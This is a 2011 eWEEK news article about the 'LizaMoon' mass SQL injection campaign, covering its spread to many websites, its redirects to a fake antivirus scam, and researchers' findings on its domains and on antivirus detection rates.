'LizaMoon' Mass SQL Injection Attack Escalates Out of Control

 
 
By Fahmida Y. Rashid  |  Posted 2011-04-01
 
 
 

A mass SQL injection attack that initially compromised 28,000 Websites has spiraled out of control. At the last count, more than a million sites have been compromised, with no end in sight.

Security firm Websense has been tracking the "LizaMoon" attack since it started March 29. The company's malware researchers dubbed the attack LizaMoon after the first domain that victims were redirected to. At the redirected site, users saw a warning dialog that they had been infected with malware and a link to download a fake antivirus.

The users are shown a number of threats supposedly on their computer, but the fake AV, Windows Stability Center, won't remove them until the user pays up, in a "very traditional rogue AV scam," wrote Patrik Runald, the Websense researcher who has been following the attack over the past few days.

The list of redirect URLs has ballooned in the days since, as Websense updated its list March 31 with 20 additional sites, making this one of the biggest mass-injection attacks ever.

More than 500,000 URLs have been injected with LizaMoon, according to Runald. If all the domains used in the attack are considered, eWEEK found about 2.9 million results on Google Search that have been compromised.

"Google Search results aren't always great indicators of how prevalent or widespread an attack is as it counts each unique URL, not domain or site," Runald said. It is safe to consider hundreds of thousands of domains have been hit, he said.

Websense researchers are still trying to figure out how the SQL injection attack is happening. Somehow, legitimate Websites have been compromised in a way that one line of code has been embedded on the site. That code is a simple redirect, and executes when the user loads the page. The bulk of the action happens on the redirected page, where a script containing Javascript code kicks off the fake AV scam.

Commenters asked Websense why researchers were so convinced it was a SQL injection on multiple Websites and not a mass cross-site-scripting attack. The researchers said they'd been contacted by people who have seen the code in their Microsoft SQL Server 2003 and 2005 databases. The vulnerabilities weren't within the database software, but "most likely in the Web systems used by these sites, such as outdated CMS and blog systems," Runald said.

Considering the large number of sites infected, users all around the world are affected, with victims in the United Kingdom, Kuwait, India, Australia, Turkey, Brazil, Israel, Mexico, Taiwan and Chile, among others, according to figures from Websense Threatseeker Network. The bulk of the victims, at 47 percent, appear to be from the United States.

The domains used in this attack, including the redirect URLs and the server where the malware is hosted, are all associated with one of four IP addresses, according to Dancho Danchev, an independent security expert. While the 20 or so domains being used as the redirect URL rotate between two IP addresses, Danchev has identified more than 120 India-based or Cocos Island-based domains all pointing to one malware host server, and 50 India-based domains going to another.

The domains have all been registered using automatically registered accounts at Gmail, Danchev said. The first domain on the list was registered as far back as October 2010, and new domains have been added since LizaMoon exploded, according to Runald.

First, the good news: Users are hit with the Windows Stability Center scam only once, so visiting the site repeatedly doesn't repeat the attack.

The bad news: Not many antivirus programs seem to be able to detect the Windows Stability Center. VirusTotal is a service that checks malware samples against 43 major antivirus products to see which products can detect it. As of April 1, only 17 out of the 43 tested block Windows Stability Scanner. At least, security companies are moving on this threat: It was only 13 out of 43 March 31.

 


Rocket Fuel